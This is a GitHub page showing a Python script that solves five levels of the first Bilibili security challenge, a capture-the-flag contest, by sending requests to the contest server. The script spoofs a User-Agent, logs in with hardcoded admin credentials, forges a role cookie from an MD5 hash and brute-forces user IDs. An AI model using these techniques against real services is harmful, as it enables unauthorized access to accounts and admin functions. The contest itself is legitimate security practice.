forked from techstay/python-study
-
Notifications
You must be signed in to change notification settings - Fork 0
/
first.py
52 lines (38 loc) · 1.31 KB
/
first.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
# B站首届安全挑战赛
import requests
from pprint import pprint
import hashlib
# 从浏览器获取自己的B站session
bilibili_session = ''
cookies = {'session': bilibili_session}
def flag1():
response = requests.get('http://45.113.201.36/api/admin', cookies=cookies)
pprint(response.json())
def flag2():
response = requests.get('http://45.113.201.36/api/ctf/2', cookies=cookies,
headers={'User-Agent': 'bilibili Security Browser'})
pprint(response.json())
def flag3():
response = requests.post(
'http://45.113.201.36/api/ctf/3', cookies=cookies,
headers={'Content-Type': 'application/json'}, json={'username': 'admin', 'passwd': 'bilibili'})
pprint(response.json())
def flag4():
cookies_with_role = cookies
cookies_with_role['role'] = hashlib.md5(b'Administrator').hexdigest()
response = requests.get(
'http://45.113.201.36/api/ctf/4', cookies=cookies_with_role)
pprint(response.json())
def flag5():
start_uid = 100336889
for i in range(start_uid, start_uid + 100):
response = requests.get(
'http://45.113.201.36/api/ctf/5', cookies=cookies, params={'uid': i})
if response.json()['code'] == 200:
pprint(response.json())
break
flag1()
flag2()
flag3()
flag4()
flag5()